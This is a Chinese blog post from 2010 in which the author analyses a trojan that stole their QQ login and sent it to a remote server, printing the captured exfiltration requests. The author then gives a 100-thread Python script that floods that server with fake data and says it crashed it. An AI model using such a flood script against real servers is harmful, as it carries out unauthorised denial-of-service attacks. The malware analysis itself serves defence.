今天早上登QQ，提示我QQ号码被限制登录了。晕，第一反映就是QQ密码被盗了。解除限制、修改密码，登录后QQ提示我上次登录地址是在贵州某地，看来真是中招了。

前几天下了几个小软件，没太注意，感觉可能就是它们有问题啊。

看了一下桌面上QQ的快捷方式，一看吓一跳。路径不对，QQ的主程序被修改为C:\Program Files\qcat\qsetup.exe了。

看来问题就出在这个qcat上了。

于是用SysAnalyzer分析了一下这个qsetup.exe的行为，一看全明白了：

（1）点击桌面的QQ图标，qsetup.exe被运行。

（2）qsetup.exe启动真正的qq.exe，并注入QQ的进程。

（3）qsetup.exe捕捉到登录框输入的QQ号码和密码后，并使用HTTP协议向113.105.157.82:81提交了数据。

可恶啊！！

看抓包截图：

这一步是它通过远程主机获取本机的外网IP。

整个过程它向服务器发送了三次HTTP请求，报文数据如下：

GET /wulai/baibai/fan.asp?ID=2460&Action=GetMyIP HTTP/1.1

User-Agent: Forthgoer

Host: 113.105.157.82:81

GET /wulai/baibai/fan.asp?UserID=baibai&ID=2460&Action=Reg&EncStr=4085a33e874ee3fecc HTTP/1.1

User-Agent: Forthgoer

Host: 113.105.157.82:81

Cookie: ASPSESSIONIDAQACCQCT=MNKHDFKDEPJDFPOHJNKEONNF

GET /wulai/baibai/fan.asp?UserID=baibai&Number=1621189649&PassWord=mynameisredicecn

HTTP/1.1

User-Agent: Forthgoer

Host: 113.105.157.82:81

太可恶了。  不能就这么便宜它了。

于是乎写了个Python脚本，以100线程的速度向那个服务器提交虚假的数据。

大约1分钟后，服务器挂了，这是啥服务器啊？太悲剧了。

# coding:utf-8
#刷死盗QQ号者.py
# by redice 2010.12.15

import sys
reload(sys)  
sys.setdefaultencoding('utf-8') 

from sitedigger import download

down = download.DownLoad()

i=0

import threading

def worker():
    global i
    while True:
        i=i+1
        url = 'http://113.105.157.82:81/wulai/baibai/fan.asp?UserID=baibai&Number='+str(i)+'&PassWord=fuckyou'
        down.getHtml(url=url,cached=False)
        print i


#init thread_pool 
thread_pool = []

for i in range(100): 
    th = threading.Thread(target=worker,args=()) ; 
    thread_pool.append(th)

# start threads one by one         
for thread in thread_pool: 
    thread.start()

#collect all threads 
for thread in thread_pool: 
    threading.Thread.join(thread)
        

后来我用在线沙盘工具threatexpert检测了一下qsetup.exe，得出的结论也基本一样。

报告地址如下：

http://www.threatexpert.com/report.aspx?md5=803fb5e128fb3cb933c658cbb987b392

告诫大家一句：

以后再从网上下载什么小工具，不要偷懒啊，先用在线沙盘测一下，没问题了再用。